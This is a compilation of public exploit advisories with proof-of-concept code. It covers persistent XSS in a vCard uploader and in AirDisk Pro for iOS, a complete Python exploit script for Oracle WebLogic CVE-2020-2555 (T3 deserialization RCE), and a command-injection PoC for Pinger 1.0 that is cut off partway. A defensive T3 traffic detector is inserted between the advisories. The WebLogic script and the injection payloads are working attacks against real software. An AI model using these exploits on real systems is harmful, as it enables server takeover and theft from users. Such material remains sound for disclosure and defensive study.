The cross site scripting vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting vulnerability follow the provided information and steps below to continue.

PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>

PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>

PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe> 09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"

PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD

--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 .vcf&newPath=/evil-filename>"<iframe src=evil.source onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close

Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values next to add, edit or imports to prevent an execution
2. Restrict and filter in the index listing the vcf names to sanitize the output

Security Risk:
==============
The security risk of the persistent vcf cross site scripting web vulnerability is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab   facebook.com/VulnerabilityLab   youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php   vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555

[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB

[Exploit Program Code]
--------------------------

#!/usr/bin/python
# @nu11secur1ty
# Python 2 script: it relies on print statements and on str literals being byte strings.
import socket
import os
import sys
import struct

# host, port and payload file are all required (argv[3] is read below)
if len(sys.argv) < 4:
    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers (the T3 protocol hello)
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

# serialized object supplied by the caller, spliced into the T3 message below
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

# rewrite the 4-byte big-endian length prefix of the T3 message
payload=struct.pack('>I',len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.send(payload)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

[Vendor]
Oracle

[Vulnerability Type]
Network Remote

[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
[Disclosure Timeline]
2019/12/10

[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc

@nu11secur1ty

--
nu11secur1ty
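The advisory's attack surface is the T3 listener, so a sensor that can recognise the hello the script sends and the length-framed messages carrying Java serialization streams is the natural detection point. The following is an added example (not the exploit author's code nor Oracle's): the sample frame is constructed from the structure visible in the script above, not captured traffic.

```python
import struct

# Stream header written by java.io.ObjectOutputStream; every serialized object
# graph inside a T3 message starts with it.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# The handshake block the script sends first (copied from the script above).
SAMPLE_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"


def parse_t3_hello(data):
    """Parse a client-side T3/T3S hello ("t3 <version>\\nKEY:value\\n...\\n\\n").
    Returns a dict of fields, or None if the bytes do not open a T3 session."""
    if not (data.startswith(b"t3 ") or data.startswith(b"t3s ")):
        return None
    end = data.find(b"\n\n")
    if end == -1:
        return None
    lines = data[:end].decode("ascii", "replace").split("\n")
    proto, _, version = lines[0].partition(" ")
    fields = {"protocol": proto, "version": version}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            fields[key] = value
    return fields


def t3_message_length(data):
    """Big-endian length prefix of a framed T3 message; the script rewrites it
    with struct.pack('>I', len(payload)) so it equals the whole message size."""
    if len(data) < 4:
        return None
    return struct.unpack(">I", data[:4])[0]


def find_java_objects(data):
    """Offsets of every serialized Java stream inside one T3 message."""
    offsets = []
    start = 0
    while True:
        i = data.find(JAVA_SERIAL_MAGIC, start)
        if i == -1:
            return offsets
        offsets.append(i)
        start = i + len(JAVA_SERIAL_MAGIC)


def assess_stream(first_packet, later_packets):
    """Sensor verdict for one TCP stream: a T3 hello followed by messages that
    embed serialized Java objects is what this class of exploit looks like."""
    hello = parse_t3_hello(first_packet)
    if hello is None:
        return {"t3": False}
    n_objects = sum(len(find_java_objects(p)) for p in later_packets)
    framing_ok = all(t3_message_length(p) == len(p) for p in later_packets)
    return {
        "t3": True,
        "version": hello["version"],
        "peer_url": hello.get("PU"),
        "serialized_objects": n_objects,
        "framing_consistent": framing_ok,
        "alert": n_objects > 0,
    }


def build_sample_message():
    """Constructed T3 frame (not captured traffic): length prefix, a few opaque
    bytes, a 0xFE010000 marker, then one serialized stream naming a WebLogic class."""
    body = (b"\x01\x65\xff\xff\xff\xff" + b"\xfe\x01\x00\x00"
            + JAVA_SERIAL_MAGIC + b"sr\x00\x1dweblogic.rjvm.ClassTableEntry")
    return struct.pack(">I", 4 + len(body)) + body


if __name__ == "__main__":
    print(assess_stream(SAMPLE_HELLO, [build_sample_message()]))
```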
-
AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A

Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203

Release Date:
=============
2020-04-15

Vulnerability Laboratory ID (VL-ID):
====================================
2203

Common Vulnerability Scoring System:
====================================
4.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection with automatic search of nearest devices. Users can perform file operations on the application like: Copy, Move, Zip, Unzip, Rename, Delete, Email, and more. Easy to create file like: Text File, New folder, Playlist, Take Photo/Video, Import From Library, and Voice Record.

AirDisk Pro allows you to store, view and manage files on your iPhone, iPad or iPod touch. You can connect to AirDisk Pro from any Mac or PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. AirDisk Pro features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most of the file operations: like delete, move, copy, email, share, zip, unzip and more.
(Copy of the Homepage: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile application.

Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)

Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
No authentication (guest)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities have been discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side.

The first vulnerability is located in the `createFolder` parameter of the `Create Folder` function. Attackers are able to name or rename paths via the airdisk pro ui to malicious persistent script codes. This allows the persistent injected script code to execute on the front site of the path index listing, in the content itself, on each refresh. The request method to inject is POST and the attack vector is located on the application-side. Interaction to exploit is as well possible through the unauthenticated ftp service started on the local network.

The second vulnerability is located in the `deleteFile` parameter of the `Delete` function.
The output location with the popup that asks for permission to delete allows the script code to execute. The injection point is the file parameter and the execution point occurs in the visible delete popup with the permission question. The request method to inject is POST and the attack vector is located on the application-side.

The third web vulnerability is located in the `devicename` parameter that is displayed on the top next to the airdisk pro ui logo. Remote attackers are able to inject own malicious persistent script code by manipulation of the local apple devicename information. The injection point is the devicename information and the execution point occurs in the file sharing ui panel of the airdisk pro mobile web-application.

Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] AirDisk pro Wifi UI

Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1. Create Folder

PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection" value="test"></td><td class="i"><a href="test/"><img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"><a href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px; width:15px;"> </span></td><td class="e"><a href="#" title="Rename file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td class="e"><a href="#" title="Delete file" onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15" height="15"></a></td></tr><tr class="c"><td class="e"><input type="checkbox" name="selection" value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td class="k">Folder</td><td class="e"><span style="height:15px; width:15px;"> </span></td><td class="e">
<a href="#" title="Rename file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e">
<a href="#" title="Delete file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr><tr><td class="e"><input type="checkbox" name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" width="20" height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec 2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web Archive</td>
<td class="e"><a href="#" title="Download file" onClick="downloadFile("Help.webarchive");"><img src="/webroot/webdownload.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Delete file" onClick="modalPopup("Help.webarchive", 2, 2);"><img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>

--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257

Note: Adding via ftp on mkdir or file is as well possible without authentication on the default setup.

2. Delete / Old Popup

PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
<div id="modal-title"><h3>Delete File</h3></div>
<div id="modal-text"><a>Are you sure you want to delete this file?"test"</a></div>
<form name="input" action="" method="post">
<div id="modal-field"><input type="hidden" name="deleteFile" value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT CODE]"></div>
<input type="hidden" name="ID" id="ID" value="test">
<input type="submit" name="submitButton" id="submitButton" value="Delete">
</form>
</div>

--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699

Note: Comes up when somebody tries to delete the malicious injected path.

3. Devicename

PoC: Vulnerable Source
<div id="headerWraper">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td><a href="./"><img src="/webroot/webicon.png" id="headerImg" width="57" height="57"/></a></td>
<td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>
</tr>
</table>
</div>

--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612

Note: Executes each time the wifi sharing ui service of airdisk pro is opened by local or remote users.

Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all inputs and filter all involved parameters to prevent application-side attacks.
2. Parse the output location of the popup permission message content to prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction by a secure parsing mechanism.

Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities in the application functions is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
Pinger 1.0 - Remote Code Execution
# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A

================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================

# Description:
simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down.

# PoC :
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php

# Vulnerable code:
<?php
if(isset($_GET['ping'])){
    // if this is ever noticably slower, i'll pass it stuff when called
    // change the good.xml to config.xml, good is what I use at $WORK
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['ping'] == ""){
        $host = "127.0.0.1";
    }else{
        $host = $_GET['ping'];
    }
    // $host is concatenated unescaped into the command line: this is the injection point
    $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout.' '.$host.' | grep received | awk \'{print $4}\''));
